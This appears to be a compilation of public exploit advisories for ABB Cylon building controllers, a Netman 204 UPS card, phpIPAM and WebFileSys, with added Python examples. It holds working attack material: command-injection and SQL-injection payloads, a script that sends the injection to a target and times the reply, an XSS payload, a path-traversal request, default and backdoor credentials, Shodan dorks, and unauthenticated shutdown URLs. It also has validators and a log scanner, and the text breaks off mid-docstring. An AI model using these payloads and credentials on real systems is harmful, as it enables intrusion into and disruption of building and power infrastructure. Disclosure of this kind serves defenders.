
ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The Electronic Security Control (ESC) device update script,
escDevicesUpdate.php, takes the number of submitted rows from the rowCount
POST parameter and uses it, unvalidated, as the bound of the loop that reads
the escidN/removeN fields and writes them into the esc-ip-addr array of the
comm properties INI file. The loop runs while $i < rowCount starting at 1, so
the last submitted row is never processed (the off-by-one), and because
rowCount is attacker-controlled there is no upper limit either: a value such
as 2511531337 drives billions of iterations that read absent POST keys (a PHP
notice and null each time, not a memory-unsafe access) and append empty
entries to the array until the memory or execution-time limit aborts the
request before INI::write runs. The escid values are only trimmed, never
checked to be IP addresses, before being written to the configuration.
Successful exploitation leads to a crash or disruption of service, and a
long request body makes the loop cheaper for the attacker than for the device.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5902
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php
CVE ID: CVE-2024-48844
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48844


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/escDevicesUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2511531337&\
> escid1=192.168.1.1&\
> remove1=0&\
> escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&\
> remove2=0&\
> etc.
> etc.


$ cat escDevicesUpdate.php
...
...
$ini = INI::read($comproperties);

unset($ini['comm']['esc-ip-addr']);

$rowCount = $_POST['rowCount'];   // attacker-controlled: no cast, no upper bound

// 1 <= $i < rowCount: the last submitted row is skipped, and every index
// below the bound is visited whether or not an escidN field was sent
for ($i = 1; $i < $rowCount; $i++) {
    $fieldEscid = "escid" . $i;
    $fieldRemove = "remove" . $i;
    if ($_POST[$fieldRemove] != 1) {
        $escid = trim($_POST[$fieldEscid]);   // trimmed only, never validated as an IP
        $ini['comm']['esc-ip-addr'][$i] = $escid;
    }
}

if (!INI::write($comproperties, $ini)) {
    logWarning("ESC device listt modification FAILED");
    $myLine = __LINE__;
    errorCall($myLine);
}
...
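A validator that closes the three gaps visible in the listing (an unbounded rowCount, the `<` loop boundary, and escid values that are never checked), written here as an added Python example rather than a patch to the vendor's PHP. The 64-row cap is an assumed limit, as is the reading that removeN equal to "1" drops a row; the address check is Python's `ipaddress` module.

```python
import ipaddress

# Assumed upper bound on ESC devices; the real limit is a product decision.
MAX_ROWS = 64


def parse_esc_rows(post, max_rows=MAX_ROWS):
    """Return the list of ESC IP addresses to keep, or raise ValueError.

    Mirrors escDevicesUpdate.php's field layout (rows 1..rowCount carrying
    escidN / removeN) with the checks the script lacks: rowCount must be a
    small non-negative integer, every row up to and including rowCount is
    visited (the original loop stops one short), and each kept escid must
    parse as an IPv4 or IPv6 address before it reaches the INI file.
    """
    raw = post.get("rowCount", "")
    if not raw.isdigit():
        raise ValueError("rowCount must be a non-negative integer")
    row_count = int(raw)
    if row_count > max_rows:
        raise ValueError(f"rowCount {row_count} exceeds the limit of {max_rows}")

    kept = []
    for i in range(1, row_count + 1):          # inclusive: row rowCount is a real row
        if post.get(f"remove{i}", "0") == "1":  # assumed: "1" means drop this row
            continue
        escid = post.get(f"escid{i}", "").strip()
        try:
            kept.append(str(ipaddress.ip_address(escid)))
        except ValueError:
            raise ValueError(f"escid{i} is not an IP address: {escid!r}") from None
    return kept


def rejects(post):
    """True when parse_esc_rows() refuses the submission."""
    try:
        parse_esc_rows(post)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The advisory's own PoC body, modelled as a dict: rejected on rowCount alone.
    poc = {"rowCount": "2511531337", "escid1": "192.168.1.1", "remove1": "0",
           "escid2": "192.168.1." + "A" * 60, "remove2": "0"}
    print("PoC rejected:", rejects(poc))
```

Rejecting on the first bad field, rather than silently dropping it, matters here because the script unsets the whole esc-ip-addr array before the loop; a partial write would leave the device with fewer ESC entries than the operator submitted.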
            
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
blind command injection vulnerability. Input passed to several POST parameters
is not properly sanitized when writing files, allowing attackers to execute
arbitrary shell commands on the system. There is also an off-by-one error in
array access that could lead to undefined behavior and potential DoS.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5903
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839


21.04.2024

--



$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2&\
> ip1=192.168.1.1&\
> port1=47808&\
> hexMask1=0xFFFF&\
> remove1=0&\
> ip2=192.168.1.2&\
> port2=47809&\
> hexMask2=0xFFFF; sleep 17; #&\
> remove2=0&\
> submit=Submit

$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCountNAT=2&\
> NATip1=192.168.1.1&\
> NATport1=2222&\
> NAThexMask1=0xFFFF&\
> NATremove1=7&\
> NATip2=192.168.1.2&\
> NATport2=2223&\
> NAThexMask2=0xFFFF; sleep 17; #&\
> NATremove2=0&\
> submit=Submit
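The two PoC requests above confirm the injection by timing alone: hexMask2 ends in `; sleep 17; #`, so a reply that arrives about seventeen seconds later than a benign submission proves the field reached a shell. The script below, an added example that is not part of the advisory, automates that comparison for both the BBMD and the NAT table using only the Python standard library. The two-second jitter allowance and the `check()` wrapper are my choices. Every request, baseline included, genuinely rewrites the controller's BBMD entries, so run it only against a unit you are authorised to reconfigure.

```python
import sys
import time
import urllib.parse
import urllib.request

BENIGN_MASK = "0xFFFF"


def bbmd_form(delay=None, nat=False):
    """Form fields for bbmdUpdate.php, mirroring the advisory's PoC.

    delay=None gives a benign submission; an integer puts the PoC's
    '; sleep N; #' payload into the second row's hexMask field.
    nat=True produces the NAT-table variant (rowCountNAT, NATip1, ...).
    """
    p = "NAT" if nat else ""
    mask2 = BENIGN_MASK if delay is None else f"{BENIGN_MASK}; sleep {delay}; #"
    return {
        ("rowCountNAT" if nat else "rowCount"): "2",
        f"{p}ip1": "192.168.1.1", f"{p}port1": "47808",
        f"{p}hexMask1": BENIGN_MASK, f"{p}remove1": "0",
        f"{p}ip2": "192.168.1.2", f"{p}port2": "47809",
        f"{p}hexMask2": mask2, f"{p}remove2": "0",
        "submit": "Submit",
    }


def timed_post(url, session_id, fields, timeout):
    """POST the form with the PHPSESSID cookie and return the elapsed seconds.

    Network errors and read timeouts are swallowed on purpose: a reply that
    never comes back within the window is itself a timing signal.
    """
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(
        url, data=data, headers={"Cookie": f"PHPSESSID={session_id}"})
    start = time.monotonic()
    try:
        urllib.request.urlopen(req, timeout=timeout).read()
    except OSError:          # URLError, HTTPError and socket.timeout all derive from it
        pass
    return time.monotonic() - start


def looks_injectable(baseline, injected, delay, slack=2.0):
    """True when the injected request outlasted the baseline by roughly `delay`."""
    return injected - baseline >= delay - slack


def check(url, session_id, delay=17, nat=False):
    """Benign request first, then the sleep payload; returns (baseline, injected, verdict)."""
    base = timed_post(url, session_id, bbmd_form(None, nat), timeout=delay)
    inj = timed_post(url, session_id, bbmd_form(delay, nat), timeout=delay * 2)
    return base, inj, looks_injectable(base, inj, delay)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: bbmd_sleep_check.py http://<host>/bbmdUpdate.php <PHPSESSID>")
    for nat in (False, True):
        base, inj, hit = check(sys.argv[1], sys.argv[2], nat=nat)
        table = "NAT" if nat else "BBMD"
        print(f"{table}: baseline {base:.1f}s, injected {inj:.1f}s -> "
              f"{'command injection confirmed' if hit else 'no delay observed'}")
```

A single delayed reply can be a coincidence on a busy controller; repeating `check()` with two different delays (say 5 and 17) and requiring both to track the requested value is the cheap way to rule that out.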
            
# Exploit Title: phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.5.1
# Tested on: Ubuntu Windows
# CVE : CVE-2023-24657
PoC:

1) http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2) http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22

Sink: print @$_REQUEST['closeClass']
Vulnerable Variable: closeClass
Source: $_REQUEST['closeClass']
Sanitization Mechanisms Before Patch: None
Sink Context Constraints: Reflected within HTML attributes without escaping
Attack Payload: " onclick="alert(1)"
Execution Path Constraints: Directly accessed from the 'closeClass' parameter without modification
Request URL: http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22
Request Method: GET
Final PoC: http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22

(Replace the "phpipam" host in the URLs with your target's domain name.)
            
ABB Cylon Aspect 3.08.03 (CookieDB) SQL Injection
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.03

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from SQL injection through the key
and user parameters of the CookieDB component. Both values are concatenated
straight into the DELETE and SELECT statements shown below rather than bound
as parameters, allowing an attacker to alter the statements (for instance to
delete or read cookies that belong to other users), gain unauthorized access
to the database, or execute arbitrary SQL commands.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5900
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5900.php


21.04.2024

--



$ ./sqli.py -2 CookieDb.java
removeUserCookie()  -> DELETE FROM Cookies WHERE Key=\"" + key + "\"" + " AND " + "User" + "=\"" + user + "\"";
getAllUserCookies() -> SELECT * FROM Cookies WHERE User=\"" + user + "\"";
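What the concatenation in removeUserCookie() permits, beside the parameterized form that does not, as an added example that is not CookieDb.java itself. The advisory does not say which database the Java code talks to, so this runs against an in-memory SQLite table; that SQLite accepts the double-quoted string literals the Java code relies on is an assumption about the target, and the three sample rows are constructed.

```python
import sqlite3


def remove_query(key, user):
    """The exact string removeUserCookie() assembles, double quotes and all."""
    return 'DELETE FROM Cookies WHERE Key="' + key + '" AND User="' + user + '"'


def fresh_db():
    """Constructed sample table: three cookies belonging to two users."""
    db = sqlite3.connect(":memory:")
    db.execute('CREATE TABLE Cookies ("Key" TEXT, "User" TEXT)')
    db.executemany("INSERT INTO Cookies VALUES (?, ?)",
                   [("sid-1", "alice"), ("sid-2", "alice"), ("sid-3", "bob")])
    return db


def count_cookies(db):
    return db.execute("SELECT COUNT(*) FROM Cookies").fetchone()[0]


def remove_user_cookie_vulnerable(db, key, user):
    """Runs the concatenated statement; returns how many rows survive."""
    db.execute(remove_query(key, user))
    return count_cookies(db)


def remove_user_cookie_safe(db, key, user):
    """Same intent with bound parameters: the values can never become SQL."""
    db.execute('DELETE FROM Cookies WHERE "Key"=? AND "User"=?', (key, user))
    return count_cookies(db)


# A key that closes the string literal, adds a tautology and comments out the
# User clause, so the DELETE is no longer scoped to the caller's own user.
PAYLOAD = 'x" OR 1=1 --'

if __name__ == "__main__":
    print(remove_query(PAYLOAD, "bob"))
    print("rows left, vulnerable:", remove_user_cookie_vulnerable(fresh_db(), PAYLOAD, "bob"))
    print("rows left, parameterized:", remove_user_cookie_safe(fresh_db(), PAYLOAD, "bob"))
```

In Java the equivalent of the safe function is a `PreparedStatement` with `?` placeholders and `setString()`; a stored procedure, which the advisory mentions, only helps if the procedure itself does not concatenate its arguments.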
            

ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure

# Exploit Title: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
#                   CBX Series (FLX Series)
#                   CBT Series
#                   CBV Series
#                   Firmware: <=9.3.4

Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features
a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and
INTEGRA™ building management solutions. ABB BACnet controllers are designed
for intelligent control of HVAC equipment such as central plant, boilers,
chillers, cooling towers, heat pump systems, air handling units (constant
volume, variable air volume, and multi-zone), rooftop units, electrical
systems such as lighting control, variable frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's
scalable, and modular, allowing you to control a diverse range of HVAC
functions.

Desc: An authenticated attacker can access sensitive information via the
system logs page of ABB Cylon FLXeon controllers. The logs expose critical
data, including the OpenSSL password for stored certificates. This
information can be leveraged for further attacks, such as decrypting
encrypted communications, impersonation, or gaining deeper system access.

Tested on: Linux Kernel 5.4.27
           Linux Kernel 4.15.13
           NodeJS/8.4.0
           Express


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5920
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php
CVE ID: CVE-2024-48852
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852


21.04.2024

--


# JS > /diagnostics/logs-system (platform-dist)
$ curl -k "https://7.3.3.1/api/cmds" \
> -H "Cookie: user_sid=xxx" \
> -d "{\"cmd\":\"journalctl -b -r --no-hostname ^| head -c 600000 \"}"

-- Logs begin at Thu 2024-06-13 10:58:03 EDT, end at Mon 2024-09-09 09:10:33 EDT. --
Feb 13 12:38:26 node[5810]:     at endReadableNT (_stream_readable.js:1059:12)
Feb 13 12:38:26 node[5810]:     at IncomingMessage.emit (events.js:207:7)
Feb 13 12:38:26 node[5810]:     at emitNone (events.js:105:13)
Feb 13 12:38:26 node[5810]:     at IncomingMessage.onEnd (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:273:7)
Feb 13 12:38:26 node[5810]:     at done (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:213:7)
Feb 13 12:38:26 node[5810]:     at invokeCallback (/home/MIX_CMIX/node-serve"}
...
...
Sep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN="
Sep 09 09:08:18 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN="
Sep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'
Sep 09 08:59:58 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'
Sep 09 08:59:41 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/
...
...
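The leak is the `cmd = openssl ... -passin pass:...` line: the node server logs the full command line it runs, and journalctl hands that line to anyone who can call /api/cmds. The scanner below is an added example, not vendor code; it flags every OpenSSL option that carries a password on the command line (`-pass`, `-passin`, `-passout`, `-password` with a `pass:` source) in a journal dump and produces a redacted copy for safe sharing. The sample lines are constructed after the advisory's output; `hunter2` and `p@ss` are invented values standing in for the masked one.

```python
import re

# Constructed sample journal, modelled on the output above (secrets invented).
SAMPLE_LOG = """\
Sep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:hunter2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN="
Sep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'
Sep 09 08:59:41 node[5810]: cmd = openssl pkcs12 -export -password pass:p@ss -in cbxi.cert.pem -inkey cbxi.key.pem -out bundle.p12
"""

# OpenSSL's password options with an inline 'pass:' source. 'file:', 'env:'
# and 'fd:' sources do not put the secret itself on the command line and are
# deliberately not matched.
SECRET_ARG = re.compile(r"(?P<opt>-pass(?:in|out|word)?)\s+pass:(?P<secret>\S+)")


def find_openssl_passwords(log_text):
    """Return (line_number, option, secret) for every password logged inline."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        if "openssl" not in line:
            continue
        for match in SECRET_ARG.finditer(line):
            hits.append((number, match.group("opt"), match.group("secret")))
    return hits


def redact(log_text):
    """Same text with every inline password replaced, option kept for context."""
    return SECRET_ARG.sub(lambda m: f"{m.group('opt')} pass:<redacted>", log_text)


if __name__ == "__main__":
    for number, opt, secret in find_openssl_passwords(SAMPLE_LOG):
        print(f"line {number}: {opt} exposes {len(secret)}-character secret")
    print(redact(SAMPLE_LOG))
```

The durable fix on the device side is twofold: hand the passphrase to OpenSSL through `-passin file:` or `-passin env:` so it never appears in a process command line, and stop logging the assembled command at all; a scanner like this one then becomes a regression check over collected journals rather than a routine.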

ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery

# Exploit title: ABB Cylon FLXeon 9.3.4 Limited Cross-Site Request Forgery
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
#                   CBX Series (FLX Series)
#                   CBT Series
#                   CBV Series
#                   Firmware: <=9.3.4

Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features
a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and
INTEGRA™ building management solutions. ABB BACnet controllers are designed
for intelligent control of HVAC equipment such as central plant, boilers,
chillers, cooling towers, heat pump systems, air handling units (constant
volume, variable air volume, and multi-zone), rooftop units, electrical
systems such as lighting control, variable frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's
scalable, and modular, allowing you to control a diverse range of HVAC
functions.

Desc: A CSRF vulnerability has been identified in the ABB Cylon FLXeon series.
However, exploitation is limited to specific conditions due to the server's
CORS configuration (Access-Control-Allow-Origin: * without
Access-Control-Allow-Credentials: true). The vulnerability can only be
exploited under the following scenarios:

  Same Domain: The attacker must host the malicious page on the same domain
  as the target server.

  Man-in-the-Middle (MitM): The attacker can intercept and modify traffic
  between the user and the server (e.g., on an unsecured network).

  Local Area Network (LAN) Access: The attacker must have access to the same
  network as the target server.

  Subdomains: The attacker can host the malicious page on a subdomain if the
  server allows it.

  Misconfigured CORS: The server's CORS policy is misconfigured to allow
  certain origins or headers.

  Reflected XSS: The attacker can exploit a reflected XSS vulnerability to
  execute JavaScript in the context of the target origin.

Tested on: Linux Kernel 5.4.27
           Linux Kernel 4.15.13
           NodeJS/8.4.0
           Express


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5918
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5918.php

ABB Cylon FLXeon 9.3.4 - Default Credentials

ABB Cylon FLXeon 9.3.4 Default Credentials


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
                  CBX Series (FLX Series)
                  CBT Series
                  CBV Series
                  ABB UC32 Series Main Plant Controllers (Cylon's UnitronUC32.xx)
                  Firmware: <=9.3.4

Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features
a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and
INTEGRA™ building management solutions. ABB BACnet controllers are designed
for intelligent control of HVAC equipment such as central plant, boilers,
chillers, cooling towers, heat pump systems, air handling units (constant
volume, variable air volume, and multi-zone), rooftop units, electrical
systems such as lighting control, variable frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's
scalable, and modular, allowing you to control a diverse range of HVAC
functions.

Desc: The ABB Cylon FLXeon BACnet controller uses a weak set of default
administrative credentials that can be guessed in remote password attacks
to gain full control of the system.

Tested on: Linux Kernel 5.4.27
           Linux Kernel 4.15.13
           NodeJS/8.4.0
           Express


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5919
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5919.php


21.04.2024

--


$ cat cyloncreds.txt
admin:cylonctl
cxpro:siteguide
UC32Net:CylonCtl

Netman 204 - Remote command without authentication

# Exploit Title: Netman 204 - Remote command without authentication
# Date: 2/4/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux

Step 1: An attacker can use these dorks to find the UPS panel.

  Shodan: http.favicon.hash:22913038
      OR  https://www.shodan.io/search?query=netman+204+cgi-bin

  # Two kinds of panel were found: yellow and blue.

Step 2: For the yellow panel the attacker can use the username and password
below, because there is a backdoor account; for the blue panel the remote
commands can be used, and Burp Suite Repeater shows the details of the UPS.

Yellow Panel:

  username and password: eurek

  Some exploits for that:
    http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
    https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek

  Due to flaws in parameter validation, the URL can be shortened to:
    http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
    https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek

Blue Panel:

  username and password: admin

  Some critical leaks we can see without authentication:
    http://IP/administration-commands.html
    http://IP/administration.html
    http://IP/administration.html#
    http://IP/administration.html#LDAP
    http://IP/administration.html#active-users
    http://IP/administration.html#firmware-upgrade
    http://IP/configuration.html
    http://IP/history.html
    http://IP/index.html
    http://IP/login.html
    http://IP/system-overview.html
    http://IP/table.html

  # Using the paths above we can see the details of the UPS without authentication.

  First open Burp Suite and intercept the requests, then request the paths
  above, send that request to Repeater, send it again, and in the response
  open "Render" and enjoy :)

  Some remote commands without authentication:
    http://IP/administration-commands.html
    http://IP/administration-commands.html#
    http://IP/administration-commands.html#reboot-irms
    http://IP/administration-commands.html#reboot-mdu
    http://IP/administration-commands.html#reboot-xts
    http://IP/administration-commands.html#shutdown
    http://IP/administration-commands.html#shutdown-irms
    http://IP/administration-commands.html#shutdown-mdu
    http://IP/administration-commands.html#shutdown-restore
    http://IP/administration-commands.html#shutdown-restore-irms
    http://IP/administration-commands.html#shutdown-restore-mdu
    http://IP/administration-commands.html#shutdown-restore-xts
    http://IP/administration-commands.html#shutdown-xts
    http://IP/administration-commands.html#shutdownrestore
    http://IP/administration-commands.html#switch-irms
    http://IP/administration-commands.html#switch-on-bypass
    http://IP/administration-commands.html#test-battery

WebFileSys 2.31.0 - Directory Path Traversal

# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee
# Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html
# Software Link: http://www.webfilesys.de/webfilesys-home/download.html
# Version: 2.31.0
# Tested on: macOS
# CVE : CVE-2024-53586

GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1
Host: www.webfilesys.de
Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Priority: u=0, i
Te: trailers
Connection: keep-alive
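The request above reaches the parent of the document root because relPath is joined to it without being re-anchored. The check below is an added example in Python, not WebFileSys code (the servlet is Java); it normalises the joined path and refuses anything that no longer lies inside the root. DOC_ROOT is a made-up deployment path.

```python
import posixpath

# Constructed document root; the real location is a deployment setting.
DOC_ROOT = "/srv/webfilesys/docroot"


def resolve_rel_path(rel_path, root=DOC_ROOT):
    """Map a user-supplied relPath onto the document root, or raise ValueError.

    A leading slash is stripped so an absolute relPath cannot replace the
    root, '..' segments are collapsed by normpath, and the result must still
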